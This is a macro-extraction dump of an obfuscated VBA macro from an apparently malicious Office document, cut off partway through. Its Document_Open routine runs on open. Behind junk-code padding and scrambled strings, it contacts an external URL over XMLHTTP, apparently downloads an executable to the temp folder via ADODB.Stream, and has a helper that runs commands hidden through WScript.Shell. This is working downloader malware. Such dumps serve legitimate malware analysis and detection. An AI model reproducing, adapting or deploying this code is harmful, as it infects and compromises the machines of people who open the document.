Filename     : ./macros/0a7bf1c1244305f0f9bf935b0d72f381356878adbff064697008f3e6e2e018bb
OLE stream   : Macros/VBA/ThisDocument
VBA filename : ThisDocument.cls
----------------------------------------
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub hWvspyZ(wUjCek As String, ROugaDy As String, yEPHpHu As String, HWkknK As String)
    AZExHptj = "G-yJOFaEUCg" + "DRDhes)]PUuLP^@Q*jk" + "qxJuTqYz*D"
    NFtovv = Right("FMfGdWR)CTq", 5)
    uTUBY = UCase("q)I#%YQa@SCb?VDh.*T")
    xJmTr = Left("P%kpN]c@(HGu*ImjAWw(", 3)
    xJmTr = 1183 + 1415 + 1510
    xJmTr = UCase("dazfuFdA^e@I@A#")
    iarpkGY = 198 + 229 + 1918
    DNcADa = Left("nlLyv#kL niH", 2)
    AZExHptj = 1768 + 405 + 116
    Set IKPfKj = CreateObject(wbYhCzxL("WySSc&rTiWpstU.qSehheDlMla"))
    IKPfKj.Run wUjCek, 0
    NFtovv = RTrim("yvW.srFEGldW]UnT%")
    dRJNzAWI = Right("S?xMyE?MBYAWO", 2)
    dRJNzAWI = "_eBSabwQg&.Op[hO" + "ZV@egQFd-( V?V[DC&" + "BRi%WPF#M%$kZ"
    uTUBY = 1829 - 581 - 1568
End Sub

Private Function ewGLzC(gJWtXg As Integer) As String
    mNhsI = UCase("mqsEeihuXYmEOSG i[Ux")
    For hwJdBu = 0 To 250
        xJmTr = Right("&U*@$-jsbhj", 2)
        EhiXZPAc = UCase("eXMq#SVpi]")
        AZExHptj = 1148 + 600 + 1353
        EhiXZPAc = Right("yY!LtXomPDy", 2)
        xJmTr = LTrim("oskyzp%X%dfLo-f(%(b")
        mNhsI = Left(" I-&?YKX.[TX$TE.", 4)
        dRJNzAWI = RTrim("Pm$Fn.emWao")
    Next hwJdBu

    xJmTr = UCase("yWw!-qnx d&K!-RT_")
    iarpkGY = StrReverse(".BccMTKPmG(mjX ?")
    NFtovv = "hUcKT[ZUqhR@d" + "K$B]khdFfv^LJ" + "yQHPxJ]C*&fCEEiKZe"
    uTUBY = RTrim("c-*MFDxedjUW@D@&q")
    DNcADa = LTrim("TCgpp-j&K&DjG)fE")
    NFtovv = Space(20)
    DNcADa = UCase("fYik&tqXP?M")
    xJmTr = 370 - 304 - 1287
    iarpkGY = UCase("DJG&vZKyif")
    DNcADa = 1101 + 116 + 240
    AZExHptj = Space(11)
    mNhsI = UCase("HM?[OK^c wx^vyqVafj")
    EhiXZPAc = StrReverse("ugzvY&DEUwSZ")
    dRJNzAWI = Left(")RRiO^#GP!LhlA", 5)
    xJmTr = 1588 + 661 + 1347
    DNcADa = LTrim("]nFAcS@&Ta_!]d[")
    xJmTr = Left("Tw?W-W@MiEta", 3)
    iarpkGY = RTrim(" rtH()Vg-M&Wxm#w?qTj")
    AZExHptj = Left("fw$j!!boL[_KLK^oAlb.", 3)
    iarpkGY = Left("-z]SF-F%kmvQUf(E@W", 2)
    DNcADa = Left("ulPY%tKpg!i#dhAr", 5)
    NFtovv = 1773 - 1608 - 909
    ewGLzC = "VhrbFlzqhUcvzePuhfnSWckj"
End Function

Private Function nXLJrf(InZjiiW As Boolean, YkTfuz As String) As String
    EhiXZPAc = Left("v#vi!C-JO$X$t)", 2)
    While rWoVSw < 46
        DNcADa = RTrim("lT%]H o jry&g.Cgz[hw")
        mNhsI = Space(20)
        dRJNzAWI = RTrim("aIzSJ$Cb$zfBEYxD..P")
        AZExHptj = 1217 - 1286 - 1600
        iarpkGY = StrReverse("rDFZdBXLtChlsTv%(")
        uTUBY = RTrim("d*jNTHEs@Na@^mwl")
        iarpkGY = 343 - 285 - 1671
        EhiXZPAc = UCase("u]sN_?TiK?E.")
        rWoVSw = rWoVSw + 3
    Wend

    DNcADa = 549 + 1722 + 1143
    NFtovv = "eRpAxPu!D.q" + "Un%#^tch$nL" + "O(ujVSDy GVxsPd@l"
    xJmTr = 1547 - 1019 - 1511
    AZExHptj = 1745 - 1649 - 1705
    EhiXZPAc = LTrim("aDCYTIPlZOQ-YWhZd")
    dRJNzAWI = RTrim("AExwgJ^YiusJ")
    iarpkGY = StrReverse("fnI#yG#ciBoYjQV(Y")
    DNcADa = 892 + 257 + 192
    dRJNzAWI = StrReverse("LchC#G.k iN&")
    EhiXZPAc = Space(20)
    mNhsI = 1589 + 388 + 521
    DNcADa = 898 + 286 + 797
    mNhsI = RTrim("nQ!Flp[n!T!wTU")
    NFtovv = Space(7)
    NFtovv = Right("HPzA@aTvdo[(", 4)
    dRJNzAWI = StrReverse("KOsydzTda[")
    uTUBY = Left("EE*ksvaXvq^#a^", 5)
    NFtovv = UCase("Pe(%phViqpTI")
    For GiJzRG = 0 To 314
        mNhsI = 1443 - 387 - 466
        iarpkGY = StrReverse("-ww]gNKMuklcQS]OxPD")
        iarpkGY = UCase("ZC[#lO--niIA[")
        iarpkGY = Right("mdC&n!iw#wMp?W@fLrQH", 4)
    Next GiJzRG

    iarpkGY = Right("s%FkfliWOn](x[QM[i", 5)
    AZExHptj = "M(-Fl!Y?rVEiO)nOY" + "yX?grY-pLbqD_CP]" + "NBpIb)feO]$uf"
    NFtovv = UCase("]EbERfYwADed")
    uTUBY = StrReverse("AmqjPPZNKW.GG#lYW")
    AZExHptj = RTrim("&]-TZGhLExu$")
    mNhsI = RTrim("O.rJa&Pm_HgpVU!Yu")
    uTUBY = UCase("qUiAp*iq&n#**wd^ee")
    uTUBY = 104 + 1026 + 1205
    iarpkGY = LTrim("Osco s wz$b-")
    EhiXZPAc = Left("TK]Yj]R?ERUHcqb@&hz", 5)
    mNhsI = Left("tshAI$JfSd#", 5)
    DNcADa = Left("(rqAmNceG#o@", 2)
    dRJNzAWI = 557 + 1926 + 1331
    nXLJrf = "JYuUCmuywuHOpYdQfbxwlHIailPtbSiYSy"
End Function

Private Sub OEFrqp(aAOmRpp As Boolean, BBYIXE As Double, foWtTKA As String, qHFxIct As Boolean, ZFcPaRU As String)
    uTUBY = Space(2)
    mNhsI = Left("wiSKS.uWKR&Lp.Fex!", 4)
    EhiXZPAc = "DXabqIGc!oUl[)N?Iek" + "zuoBtku$VyI" + "rv )tC&wzefVs$]@J)?"
    While HkVKnW < 83
        mNhsI = StrReverse("ouLFhUY-lbyrA@")
        iarpkGY = RTrim("PFAlZq$nw.")
        AZExHptj = StrReverse("FA_vy(v.Y_E%iiONGsZT")
        EhiXZPAc = 676 - 467 - 1275
        iarpkGY = Space(1)
        iarpkGY = "*k(w@x*pJ$$R" + "%zp.lthCMNvXaaHIzXpT" + "S#l[bP*VumKjzRvDjvh"
        xJmTr = " wX^XL[!QY" + "kb%?BxHLZ#_Re%sCDl" + "E-BbWTx[DFN[JUf@wL"
        AZExHptj = StrReverse("N]%gnDYGY[P!zbGDg")
        mNhsI = Right("DnvFojYlML%", 2)
        uTUBY = UCase("ON%h[FC!rw(")
        HkVKnW = HkVKnW + 3
    Wend

    uTUBY = RTrim("zDqb[HWcZiDQ$m$vATGe")
    iarpkGY = LTrim("%P.moghhH_EvttNsqAY")
    NFtovv = LTrim("b]]A!REq_(Y#V")
    NFtovv = RTrim("CC&PLPr@XtI.nJ")
    mNhsI = UCase("-e*PgRkthi^njcQFQO")
    DNcADa = 1460 - 998 - 1770
    NFtovv = StrReverse("h$$.%wZ@xz")
    iarpkGY = RTrim("YqeawChok@.NE)V&tmI")
    DNcADa = Left("KUG-wb!oDR", 3)
    xJmTr = RTrim("OA[r?uccE(")
    AZExHptj = Space(14)
    xJmTr = 604 - 1996 - 692
    dRJNzAWI = 1962 - 902 - 1895
    mNhsI = RTrim("lyU$Q$YE.uBAt%pduxC")
    xJmTr = UCase("$shJy?qKXkCbuj?pX*B")
    xJmTr = Left("vyo^StPSJPh@cSc", 3)
    iarpkGY = StrReverse("D^WGLALa*($-B*uw]&s")
End Sub

Private Function aPCIig(WpgCTUR As Boolean) As String
    mNhsI = 1963 + 1013 + 986
    EhiXZPAc = 152 - 419 - 175
    NFtovv = "lJlRs[#X@kW&smk" + "N^)])&] n^j_" + "zRq MMo)xXRm&sP] #_]"
    For vdwriJ = 0 To 365
        mNhsI = UCase("zsD*LGxk?]quczA")
        xJmTr = RTrim("*hH]pCnmE*KRj(Q_Qu^")
        NFtovv = UCase("rJ]xZe!cgNukuCN&")
        DNcADa = LTrim("ploiJ%f?G_O^M_GQ")
        iarpkGY = Left("w.K-?oC!TWQrBFJGg", 2)
        xJmTr = Right("[bFj_-TQrwt$iyN[ l#k", 5)
    Next vdwriJ

    DNcADa = LTrim("KQUlku@y Y*#]Esn.Rfn")
    NFtovv = RTrim("n lr(uQCc[&IxS]V.V*")
    DNcADa = "spd-ygBd$s*ex!Ml" + "-$d#*p!JrGaR[gd*VX" + "HVDSx-H^_Jq"
    EhiXZPAc = Right("DEsMP*IygM", 2)
    uTUBY = Right("pmkSiwylK^DFgz", 2)
    DNcADa = UCase("bvf!IYrdolNYliu(w(HX")
    EhiXZPAc = Right("DW_hTKmng@]PJ", 2)
    dRJNzAWI = StrReverse("#NbNG!WQZCh]o RXi")
    For ajCeYy = 0 To 31
        xJmTr = Left("!d.BXhWP%ccqXiJy", 5)
        NFtovv = UCase("(HaZ]WxGV]m!!v")
        EhiXZPAc = Left("mQmWplh$tWZq_", 4)
        uTUBY = " R(Ene*zNEa^" + "I!UlbrNNe^V" + "G?WGjL_a_vd]Q#"
        AZExHptj = Right("-N.rhg$i&Ct^BAIc", 5)
        iarpkGY = Right("kWTMZm&dPpdU-", 2)
    Next ajCeYy

    AZExHptj = Left("CTpDQR-?dHjfemXHEoj", 4)
    EhiXZPAc = RTrim("BZbRcx!?[d")
    EhiXZPAc = Space(10)
    NFtovv = Space(7)
    iarpkGY = 1198 + 1685 + 1228
    dRJNzAWI = "x#HXwCAKoCwm[Tr^g%!&" + "_kLxeCBMIS" + "G^v^.)!*fD"
    AZExHptj = 1471 + 705 + 1103
    iarpkGY = 899 + 203 + 1127
    NFtovv = "NCzJ$ODaX]SFO&h& UA%" + "?GqcaHq$hWPzTp" + "SOPD?CI^S$Bz[b"
    iarpkGY = "MlZ_[ggY?u#u" + "bmLSze^xAP" + "HK%?YKCuS#ZPoD#l."
    mNhsI = 1906 + 146 + 129
    While lYPksd < 307
        xJmTr = LTrim("nqLOosJGdTzedA")
        NFtovv = 1971 + 1487 + 1525
        lYPksd = lYPksd + 2
    Wend

    NFtovv = "-bgLAlyyckev?KeCXVxI" + "ezBWghW&DZFxSYMyT" + "]B$Oj[lZVpak%*!Jp?OF"
    aPCIig = "ymINPTbicYTHJuoTcJNUbYgPoU"
End Function

Private Sub epHxIB(chiYTZn As Boolean, ItKCMz As Integer, fxBPEZi As String)
    xJmTr = UCase("E)g#v_s)B@ @TQ.SCIz*")
    iarpkGY = LTrim("^lDMeceMf[X%")
    DNcADa = UCase("OT-^fhmla)k!^YgNV")
    uTUBY = Left("gcLoCL@.ZMl!wo", 4)
    xJmTr = 499 - 876 - 1166
    EhiXZPAc = Left("IgSHHXdD-SquX", 2)
    EhiXZPAc = "V^AneJx!]^oeqDd]wW!r" + "qCI%K PXNPE*d!" + "ev(bBhHxDwe["
    EhiXZPAc = UCase("ogAsP_Ow!-&F]T dAf")
    EhiXZPAc = 984 - 1824 - 1107
    mNhsI = 617 + 1793 + 1152
    AZExHptj = 883 + 1115 + 835
    iarpkGY = Left("#LtZWioJt&Iw", 4)
    For ZBFdwE = 0 To 177
        NFtovv = "MPCUGwCC*^GTUfWO#V" + "dlYpi?H-OIFT@.rGOL?v" + "S*ykaSp$Emdj!Lx[&"
        NFtovv = RTrim("Nf[ ]zcm![")
        NFtovv = StrReverse("G*hHwAUDOk^bVgAg*V")
        uTUBY = "H@KHQB$@ocw#" + "M[@BDSmrf%VXxI" + "tqQv&Rq@?sW&nAz$iK&"
        DNcADa = LTrim("c-K-I#xRp[$ldQt?p-")
        dRJNzAWI = Right(".Nyoz$FS^MN#kEfTD]J", 3)
        DNcADa = "AMu?idUZIfBmBA]" + "X!Cl]zBF?el.Zt" + "[xdj[ rXtZ)"
        EhiXZPAc = Space(3)
        NFtovv = RTrim("?oOH[OeqxRSn]")
        uTUBY = RTrim("&V&xpoCsNIvmC#DXa")
    Next ZBFdwE

    DNcADa = "NfKl!OVHnTs" + "^.M?&X^SkCd%Q " + "hwiP%-WJpl#v"
    AZExHptj = Left("_R%dKec)G@k_vWPQ", 5)
    uTUBY = Left("g.BIJh!N.@q xTWX", 4)
    iarpkGY = RTrim(")TPo%OCyRV(")
    AZExHptj = RTrim(")(%svuc@zPA[.AAWK%!@")
    EhiXZPAc = Left("ECKx&DF&qEGMWopeKYR", 3)
    DNcADa = 114 + 1996 + 403
    uTUBY = 644 + 1721 + 776
    dRJNzAWI = StrReverse("JNbXeTXGw]!")
    xJmTr = 169 + 1958 + 1425
    iarpkGY = Right("ub.kZ#z]Cace]DMS", 4)
    NFtovv = Left("[T_g.h(AdRVBvC@F%", 5)
    iarpkGY = 1335 - 809 - 400
    uTUBY = 503 + 1922 + 1446
    mNhsI = LTrim("UL#_ YMixXJNqGi")
    mNhsI = StrReverse("VnoI*xmPp.H-")
    DNcADa = 839 - 403 - 612
    EhiXZPAc = LTrim("]f*W$uM*$s!??)]Sr&")
    DNcADa = Space(16)
    For rWrHtc = 0 To 97
        uTUBY = RTrim("J*lFBv_CDPxg%D")
        dRJNzAWI = Space(20)
        DNcADa = StrReverse("Hz#*xPZ?uud]X.")
    Next rWrHtc

    While fTsrFl < 345
        dRJNzAWI = ".irWhpHOg[TTg#G*" + "y]UEPsTURI" + "RYJW[VziPtRYWvgAT"
        xJmTr = RTrim("N$ydzSgm#cNBQp(")
        iarpkGY = Left("QgQw#wx[zk.N-", 4)
        iarpkGY = Left("d(Ql@V&.FBzb(A", 4)
        fTsrFl = fTsrFl + 1
    Wend

    iarpkGY = 1320 - 1450 - 1195
    iarpkGY = RTrim("eKbC%Z_$[rJu")
    dRJNzAWI = 693 + 263 + 274
    AZExHptj = StrReverse("eb^XCSZr$vD")
End Sub

Private Sub Document_Open()
    Dim aUArWp As String
    AZExHptj = 974 - 1787 - 338
    EhiXZPAc = RTrim("HxOIUJ_efxIVAxQ")
    xJmTr = Right("! UE?JdHoBX)Clg", 3)
    dRJNzAWI = RTrim("r$mm%]tNfm[#P*usxzNX")
    EhiXZPAc = UCase("xU[kKTJrc?nWUJ(")
    mNhsI = 930 + 840 + 206
    While rFZKTs < 330
        NFtovv = 1670 + 1371 + 1851
        iarpkGY = 1315 - 971 - 637
        mNhsI = 301 - 340 - 813
        xJmTr = Space(7)
        xJmTr = UCase("yj_x?D%U[[-jZvxVD^nh")
        rFZKTs = rFZKTs + 3
    Wend

    AZExHptj = Left("gv JmjJ&wY)b", 4)
    While zUdqEh < 210
        NFtovv = StrReverse("BjYDmYg&AN")
        AZExHptj = UCase("f .pCq]fNHtV*L]")
        NFtovv = StrReverse("WRavr?eiT*")
        EhiXZPAc = StrReverse("hfgABrw!#W(efReKL")
        EhiXZPAc = Right("zU]%rEJ#FT!Rubp iXx_", 4)
        xJmTr = Left(" hKnXUeLR$Oxe", 2)
        uTUBY = Space(10)
        EhiXZPAc = 1024 - 946 - 1594
        EhiXZPAc = LTrim("ggtQoX_i W)J.z(L")
        mNhsI = 466 - 1183 - 1748
        zUdqEh = zUdqEh + 1
    Wend

    AZExHptj = RTrim("n!(tYAQYNfq ")
    mNhsI = RTrim("J!zBj PWTABvhh&?")
    mNhsI = Right(" W%Br])#BJn-#RB", 5)
    Set joJnMr = CreateObject(wbYhCzxL("s&c-rUi!pgtgirn[gm.hfii#lqessVypsRtAeimsoib^jIeMc^t#"))
    EhiXZPAc = StrReverse("(gGgaGvpx?K vaT")
    AZExHptj = 1159 + 1489 + 976
    uTUBY = Space(18)
    xJmTr = "!.nTRjGKBNP" + "mn%KWWRmF?ku@?Ff" + ")#ks!gF(ptw"
    uTUBY = 934 - 1628 - 1417
    While uGXpZq < 224
        mNhsI = RTrim("HXFemnYf$#osEBv?dz*S")
        iarpkGY = 768 - 142 - 1141
        DNcADa = Space(2)
        NFtovv = UCase("cEnyjMgOK WdNDG_r ")
        uGXpZq = uGXpZq + 2
    Wend

    mNhsI = RTrim("rLm&srUc(lVPgpMVt^A")
    DNcADa = 1677 - 1261 - 1044
    NFtovv = Left("GlNEzgXToys", 3)
    EhiXZPAc = StrReverse("_[en[u]HN(Bu]*sc).")
    For ZxMsWA = 0 To 208
        AZExHptj = Left("tCJ)nxRK*!", 5)
        xJmTr = UCase("p%NogpHnFjW")
        xJmTr = StrReverse("?fPurS$#a?NbyU^")
        uTUBY = Right("j]?H-E?Zd-_rHH", 3)
    Next ZxMsWA

    While vlYFvh < 36
        AZExHptj = UCase("-PigC fvu@H")
        AZExHptj = LTrim("eJPUHJR[c?cloTb#jS")
        dRJNzAWI = Space(17)
        xJmTr = Left("w.zyMigneey[B$*", 5)
        mNhsI = UCase("FzQ%xqJQ(N&wI.tPkCpd")
        AZExHptj = Right("vc_s%YCb]lyrFb", 4)
        NFtovv = Space(16)
        iarpkGY = LTrim("Ulx[rn!POofJFzhaB.TO")
        xJmTr = RTrim("fBBCgIHILg-g]IzRNlX")
        vlYFvh = vlYFvh + 2
    Wend

    LZfVAJ = joJnMr.GetSpecialFolder(1 + 1)
    mNhsI = "HBOh&)uQZBnE(cu-Dc(W" + "Pm*%(pUeIIhO)S^XHwsK" + "ePiEWDHQe)"
    uTUBY = Space(6)
    For kaDvBa = 0 To 85
        NFtovv = 436 + 1882 + 369
        AZExHptj = Space(3)
        iarpkGY = Left("zkjZ#L#H%X(!M", 4)
        iarpkGY = 791 - 810 - 104
        mNhsI = RTrim("D!pMArq YpfFFZObR")
        EhiXZPAc = Right("bPz$xfvfym", 4)
        NFtovv = "RaaOVUL%I-Ateq.OA" + "JOTD#(iWn.B " + "_YwlxwD(ypyx"
    Next kaDvBa

    iarpkGY = RTrim("eK*@)vJjDDMS&")
    While OwPKEq < 190
        dRJNzAWI = Left("U]VPLgjbVC", 4)
        uTUBY = Right("!ZsfvqYk?MOyVX%n$Vi&", 3)
        iarpkGY = UCase("&FeteW-abgfBGAoT")
        iarpkGY = RTrim("IJh$Q(@-]k__")
        dRJNzAWI = Right("BG*!bAbTQnQoqbW^?", 4)
        mNhsI = "AH.L]Sj!Q&G^PY*Il" + "^gx[oTpCgItKeEiphH" + "a.mo_!OGY%wOUd"
        uTUBY = StrReverse("EGGhf#.OY##M?dY")
        OwPKEq = OwPKEq + 1
    Wend

    For CBwTlz = 0 To 85
        AZExHptj = Left(").(U?AYybDB#SH", 5)
        NFtovv = RTrim("@^$D)]Y T$%hUs_uh]DT")
        AZExHptj = Right("ZbT-YBLPKlPCItM_NpFS", 4)
        AZExHptj = LTrim("yflOeOlFS(HY%O")
        iarpkGY = StrReverse("FF%ZsB(RsZsk*RQ]oq#y")
        iarpkGY = StrReverse("rgIpZhN$fNCNnOo#az][")
    Next CBwTlz

    DNcADa = RTrim("GROnvQZ(hrkCNu*")
    mNhsI = Space(13)
    For CDoXMv = 0 To 215
        NFtovv = StrReverse("Z.hxVvesYA@.#w")
        iarpkGY = Space(15)
        NFtovv = LTrim(".O@J@BKfBaGoF")
        iarpkGY = UCase("ri#kIogbc pm")
        DNcADa = StrReverse("Eh$NGw?CRp")
        NFtovv = RTrim("YKfK]$O&Zpwa_rz-j.F")
        DNcADa = Left("nP^IH?N)hLf", 5)
        iarpkGY = StrReverse("pQoTcaqRC Pn&dm&r")
        AZExHptj = UCase("I-QOcFTyGevXfZ*rE_?")
        AZExHptj = StrReverse("kpgtxAiC[C")
    Next CDoXMv

    iarpkGY = RTrim("hTNMQR[]BR")
    NFtovv = UCase("NTW#]V-Kz-")
    uTUBY = Left("dSc&m!P!sJpp-PWZ.S", 5)
    aUArWp = StrReverse("VeBxQeq.RR)t)zpc^Cnp)Q")
    EhiXZPAc = StrReverse("wIGFby#!C&^FXZ")
    For yNahhh = 0 To 311
        NFtovv = Right("_MfAa)HSuZvAAIlIg", 4)
        uTUBY = StrReverse("CH&lJVzPMD")
        dRJNzAWI = UCase("^!x&QLwyZ[(teuOJ")
        iarpkGY = Left("XID*A[^f&L MpY", 4)
        iarpkGY = StrReverse("JUUlr#SMVEDje")
        uTUBY = StrReverse("^he^kmurlYvHvMKfJtQB")
        iarpkGY = Right("EfrNMUEcQL", 3)
    Next yNahhh

    For lnDLWt = 0 To 10
        uTUBY = 1631 + 758 + 761
        EhiXZPAc = Right(" M[UzhZ$oAY", 3)
    Next lnDLWt

    NFtovv = UCase("nnh-NpICJIXGTzmo-e_")
    iarpkGY = Space(5)
    For wEeRTb = 0 To 199
        EhiXZPAc = "KXblIDda(p@LMWIentG" + "ZgskPc$dBog&hc" + "aSBfy%RGQ eA@wqy%"
        mNhsI = 1386 + 1163 + 1825
        EhiXZPAc = LTrim("(pZ^v!eiXJ^._d@Dw")
        xJmTr = Space(6)
    Next wEeRTb

    For vCjrai = 0 To 399
        DNcADa = Space(4)
        xJmTr = UCase("fdOc_w(ifr")
        AZExHptj = StrReverse("LQdIzHzi)g%xk_@)nQ")
        AZExHptj = Left("kj?JIEfo)z", 4)
    Next vCjrai

    For UhtOFz = 0 To 338
        uTUBY = UCase("GXjcuyKvl*LMmZNoA")
        NFtovv = "awjn.)gYDU?.uZy@" + "P??aBN&uQgRQ" + "ssY&T#Hr(OTLC_r"
        iarpkGY = RTrim("p(WtzmWy^@%l")
        uTUBY = RTrim("LO%Wion!r@mJAF[m")
        NFtovv = UCase("-Js.OBwnRLe[[bzj!%AR")
        iarpkGY = Space(18)
        mNhsI = LTrim("VmXzTod-GulRUofOPtf")
    Next UhtOFz

    DNcADa = Right("ORas?I@kz-N!.EwT", 3)
    uTUBY = StrReverse("%[W_UBa S(I]ov%")
    EhiXZPAc = "OU!ZJFwXcM&m]^%" + "@ Jx  $XhK" + "M@fskoDnaalF]oj^(MVy"
    While xQyZZq < 243
        NFtovv = LTrim("kV]uZ^#wLuXNH")
        dRJNzAWI = StrReverse("Tb_ KUVLPW[SWiHM")
        iarpkGY = Space(5)
        uTUBY = 213 + 337 + 498
        DNcADa = "%#BdJIJKbuBJOtme" + "dXp.GRKVByjODtFs@r" + ")abZF)NjJM(lRrNeNz"
        AZExHptj = LTrim("iYeb$Xrbn?")
        AZExHptj = Right("NQd[WqtJO]C_*tb", 3)
        xJmTr = RTrim("hLKRn(*]k^yY(b.M")
        AZExHptj = 1837 - 1881 - 1925
        uTUBY = Right("QK.PmvtSsT", 4)
        xQyZZq = xQyZZq + 1
    Wend

    uTUBY = Right("T]ysJHXoC%jJ", 3)
    DNcADa = LTrim("LwDi%yH._)AD(C")
    dRJNzAWI = RTrim("W].QplnsHeB$")
    uTUBY = LTrim("O kJL*Z@%?_yIlFkHn")
    DNcADa = RTrim("v(J](&sU#%")
    While fQvWag < 64
        xJmTr = LTrim("WVXGHA@zEkqkxW")
        iarpkGY = UCase("OmOL*tltboZ")
        mNhsI = UCase("?%%&mfx)_[$FRWnxISa")
        DNcADa = Left("lCP@hhBOXaPSBG_lUl", 4)
        NFtovv = Left("gpvRm_lz[y", 5)
        uTUBY = Space(16)
        uTUBY = LTrim("jfQGmj% V.pkOjfuF")
        EhiXZPAc = StrReverse("_En)JekIixI")
        NFtovv = 1629 + 1345 + 507
        fQvWag = fQvWag + 1
    Wend

    iarpkGY = 1533 + 563 + 1655
    EhiXZPAc = "^iRlczWC[Yt@Id" + "AvxX^^#kMjrldg#b!" + "tP_@!^QMz&KTk^i"
    uTUBY = LTrim("[Flb_jXym[E^eV")
    dRJNzAWI = LTrim("!E^TU_ksi.D?ugL")
    DNcADa = LTrim("y]JkZJJ-lB")
    dRJNzAWI = Left("M rgXqa?)W%Im%k.K.j", 2)
    AZExHptj = Left("yEso^i-_Xi", 5)
    mNhsI = StrReverse("AJFx)pA@svQX)u")
    iarpkGY = 697 - 1270 - 1418
    uTUBY = UCase("$Cx]l_!@M!AknnLKj")
    Dim qoTdoQv, cBqKP As Object
    iarpkGY = Right("xH.bXHWkbp!AHzlO", 4)
    xJmTr = "-%FP[aYUtQwNw%xUj" + "$NDzHHb?HBYU&sp" + "LYLOvd-o(K"
    dRJNzAWI = Space(9)
    AZExHptj = StrReverse("aYSM!&EolANa.D*okh")
    Set qoTdoQv = CreateObject(wbYhCzxL("MDiDcir%oIsMo#frtG.JXDMHLFHcTKTJPy"))
    While mMBNlG < 320
        EhiXZPAc = "_MUnZllvVhpZf E" + ")uo-VRM-[S#!vSa." + " McepgIm#% Zie"
        dRJNzAWI = 1879 + 1883 + 502
        iarpkGY = RTrim("U UwsrySXQB_m")
        mNhsI = Left("WDLaUKBVk_a-I@.r-STh", 2)
        mNhsI = 1779 + 1115 + 564
        NFtovv = 204 - 300 - 1214
        mMBNlG = mMBNlG + 1
    Wend

    DNcADa = RTrim("IA!k#&K&nxkY.XD")
    xJmTr = Left("RpVyJXd-TYqIgJUv@", 2)
    mNhsI = 368 + 674 + 1182
    uTUBY = 1668 + 501 + 866
    AZExHptj = UCase("uPb&zKs#od!cv-GmWE")
    lFXlE = wbYhCzxL("hzt^t.pX:s/T/&rwaLg$e?sGal-uz#aN.$c$o.m]/_HOKR/Ui_nLv%.(e.xGe^")
    xJmTr = 1044 + 1645 + 1913
    uTUBY = Left("ToTY%(lMzk$(%.[", 3)
    EhiXZPAc = StrReverse("f-oEtZrp]oQ#c#[RO&HI")
    DNcADa = StrReverse("XfN]-P.oZrRIK%Co&B")
    EhiXZPAc = 1246 - 1677 - 507
    qoTdoQv.Open "GET", lFXlE, False
    For AUYTRc = 0 To 29
        AZExHptj = Right("VLTRv[f-GrDAOrHhK", 5)
        AZExHptj = 1211 - 253 - 148
        NFtovv = Left("YVzs.IYaMdrE", 4)
        iarpkGY = Space(12)
        DNcADa = Space(7)
    Next AUYTRc

    While GHrFsQ < 395
        NFtovv = Left("OKM xedIl%A", 4)
        NFtovv = LTrim("wxzXOnfpKslky")
        GHrFsQ = GHrFsQ + 3
    Wend

    xJmTr = 1593 + 406 + 1735
    AZExHptj = StrReverse("z-s^RTr?YB)-&es?Td")
    For aliTSi = 0 To 281
        DNcADa = StrReverse("Nmr-mMd#NFgEL")
        iarpkGY = Right("pFMvH_CjuKi", 2)
        xJmTr = 1370 + 1983 + 1703
        dRJNzAWI = LTrim("ybRWebpaKxEIXsrlp")
        DNcADa = Left("hW-WaQeGrYjout*VOPcN", 2)
        DNcADa = UCase("v!m.fAPwXJFJ(_S]vA")
    Next aliTSi

    qoTdoQv.send
    dRJNzAWI = 1559 - 1943 - 999
    NFtovv = Space(3)
    iarpkGY = StrReverse("Zc_QJ?io^Pb&?ed")
    For PbTRcd = 0 To 71
        xJmTr = RTrim("c?xs)CgOgN")
        dRJNzAWI = 775 - 1650 - 322
        xJmTr = UCase("X.QqKq!kT]d]nz]#")
        xJmTr = Left("xkrP_(@!QICRx)m#NKf", 3)
        xJmTr = UCase("Pbk$TCLFajiSFZH")
        iarpkGY = 1550 + 1434 + 274
        dRJNzAWI = 1195 + 264 + 959
        xJmTr = Right("_vQ$aQ]^pdt", 2)
        NFtovv = LTrim("DUBdtfBXn?ww#Fg&rR")
    Next PbTRcd

    While GlHHnX < 215
        dRJNzAWI = 1393 - 902 - 285
        EhiXZPAc = LTrim("*h*Xw!DD_]")
        EhiXZPAc = 618 + 1376 + 1136
        DNcADa = Space(9)
        xJmTr = 1225 - 863 - 698
        GlHHnX = GlHHnX + 1
    Wend

    dRJNzAWI = Space(14)
    If qoTdoQv.Status = 201 - 1 Then
    iarpkGY = Left("sDDKAHI(A(&]", 2)
    AZExHptj = UCase("roHH$j$AQ-")
    While guIBSR < 186
        DNcADa = 1438 + 1355 + 493
        EhiXZPAc = Space(4)
        iarpkGY = Space(1)
        AZExHptj = LTrim("ziERy?-@U(hdzHJ")
        xJmTr = 1502 - 195 - 952
        DNcADa = Space(10)
        guIBSR = guIBSR + 1
    Wend

    While GUbTmN < 168
        NFtovv = RTrim("ZCXv-PhdmBV]")
        xJmTr = LTrim("-C*Diw-VzHXKbYS&")
        AZExHptj = 1714 - 940 - 1654
        NFtovv = RTrim("vVKZFtVeS[P@&")
        xJmTr = 706 + 1270 + 157
        EhiXZPAc = Left("tLuQ _sAcw.q", 3)
        AZExHptj = Left("b%@r&OZ](VL#&igx@Ix", 2)
        GUbTmN = GUbTmN + 3
    Wend

    iarpkGY = 725 + 1491 + 944
    For jZxaum = 0 To 316
        uTUBY = RTrim("SmJePSivGeqn.h?&]JV")
        xJmTr = Left("qFVuLVbQ(X)?wEs_l&", 4)
        AZExHptj = 1671 - 609 - 479
    Next jZxaum

        Set cBqKP = CreateObject(wbYhCzxL("AkDzO#DOBZ.jSSt!rBeQaNm]"))
    NFtovv = "oFbixgrop#Ri$ikD*NNC" + "Myp_s*eXB&I NRxgj&%t" + "zaUE CtB$qnRXhjJ$"
    dRJNzAWI = RTrim("R[bOocRlkn")
    iarpkGY = 393 - 193 - 1996
    While iuaiIr < 25
        dRJNzAWI = Right("MNgPVp$GLA", 5)
        iarpkGY = Left("wHSjRH#!hj-Pur LD", 3)
        DNcADa = RTrim("jLQE?WCRNGn S")
        EhiXZPAc = StrReverse("G%Z]?-eUhO!EHZVet")
        xJmTr = Space(2)
        iuaiIr = iuaiIr + 1
    Wend

    xJmTr = RTrim("JYRb[%?EJMTi")
        cBqKP.Open
    For DcITvH = 0 To 80
        uTUBY = 1984 - 1671 - 1651
        EhiXZPAc = StrReverse(")Www& dlcn?@ NU*")
